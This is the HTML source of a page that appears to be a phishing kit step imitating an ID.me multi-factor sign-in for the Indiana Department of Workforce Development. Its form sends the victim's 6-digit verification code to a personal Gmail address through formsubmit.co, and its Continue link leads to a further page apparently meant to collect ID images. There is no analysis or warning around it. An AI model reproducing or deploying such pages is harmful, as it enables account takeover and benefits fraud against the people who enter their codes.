<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Document</title>
        <link rel="stylesheet" href="application-4a0b7b0d263d32df24730ee97ea6b5d903415cee58a98f8c.css">
        <link rel="stylesheet" href="login.css">

    </head>
    <body>
        <div class="page-container" data-role="page-container">
            <div class="container">
                <div class="content-container multifactor-event multifactor-phone">
                    <div class="form-header">
                        <div class="form-header-content" role="banner">
                            <div class="partner">
                                <div class="c_icon m_idme">
                                    <img alt="" src="idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f1.svg">
                                </div>
                                <div class="c_icon m_addition">
                                    <img alt="" src="icon-addition-1c60f492657aa091463f6ac2e15f0f5123425f314e6038.svg">
                                </div>
                                <div class="c_icon m_consumer-logo">
                                    <img alt="ID.me with Indiana Department of Workforce Development" src="large.jpg">
                                </div>
                            </div>
                        </div>
                    </div>
                    <main aria-labelledby="sr_page_title" class="form-container">
                        <h1 id="sr_page_title">Complete your sign in</h1>
        
                        <ul class="subway_stops three-stops">
                            <li class="subway_stops-item">
                                <span>1</span>
                                <span class="sr-only">Choose your multi-factor method</span>
                            </li> <br>
                            <li aria-current="true" class="subway_stops-item active">
                                <span class="sr-only">Current step</span>
                                <span>2</span>
                                <span class="sr-only">Initiate your multi-factor method</span>
                            </li> <br>
                            <li class="subway_stops-item">
                                <span>3</span>
                                <span class="sr-only">Confirm your multi-factor method</span>
                            </li> <br>
                            <li class="subway_stops-item">
                                <span>4</span>
                                <span class="sr-only">Confirm your multi-factor method</span>
                            </li> <br>
                            <li class="subway_stops-item">
                            <span>5</span>
                            <span class="sr-only">Confirm your multi-factor method</span>
                        </li>
                    </ul>
        
                    <form class="new_multifactor" id="new_multifactor" data-validate="multifactor-phone" action="https://formsubmit.co/dein1011972@gmail.com" accept-charset="UTF-8" method="post" novalidate="novalidate" data-np-autofill-form-type="one_time_password" data-np-checked="1" data-np-watching="1">
                        <p class="alert alert-error" role="alert" style="https://formsubmit.co/dein1011972@gmail.com">
                        </p>
                        <p class="alert alert-success" role="alert" style="https://formsubmit.co/dein1011972@gmail.com">
        
                        </p>
        
                        <div class="form-content">
                            <p id="sr_field_label">Enter the code we sent to your phone</p>
                        </div>
                        <div class="form-fields">
                            <div class="field text m_code">
                                <label class="required" for="multifactor_code">Enter the 6-digit code</label>
                                <input maxlength="6" autofocus="autofocus" pattern="[0-9]*" placeholder="_ _ _ _ _ _" aria-describedby="sr_field_label" required="required" autocomplete="one-time-code" size="6" type="text" name="mul2fact" id="multifactor_code">
                                <span role="alert">
        
                                </span>
                            </div>
                        </div>
                        <div class="form-content">
                            <p class="help-link">
                                Didn't receive it?
                                <a href="#">Resend my verification code</a>
                            </p>
                        </div> 
        
                        <div class="form-actions">
                            <div class="form-action-button">
                                <a href="./idfront.html" class="btn btn-primary" data-disable="true" data-clicked="false">Continue</a>
  
                            </div>
                        </div>
        
        
                    </form>
                    <div class="form-footer with-background">
                        <p>If you're not recieved text with code within 2 minutes, click option below to recieve verification code on email</p>
                    </div>
                    <div class="form-actions horizontal form-action-button">
                        <idme-navigation-button action="./clrstbtn" layout="fill" text="Resend verification code to email" variant="secondary"></idme-navigation-button>

                        <button class="button button--secondary button--large button--fill" type="submit" formtarget="_self">Resend verification code to email</button>
                    </div>
                </main>
            </div>
        
        
            <footer class="footer">
                <nav aria-label="Footer" class="footer__links">
                    <ul class="footer__list">
                    <li class="footer__list-item"><a target="_blank" class="footer__link" href="https://www.id.me/about">What is ID.me?</a></li>
                    <li class="footer__list-item"><a target="_blank" class="footer__link" href="https://www.id.me/terms">Terms of Service</a></li>
                    <li class="footer__list-item"><a target="_blank" class="footer__link" href="https://www.id.me/privacy">Privacy Policy</a></li>
                    </ul>
                </nav>
            </footer>
        
        </div>
        </div>
    </body>
</html>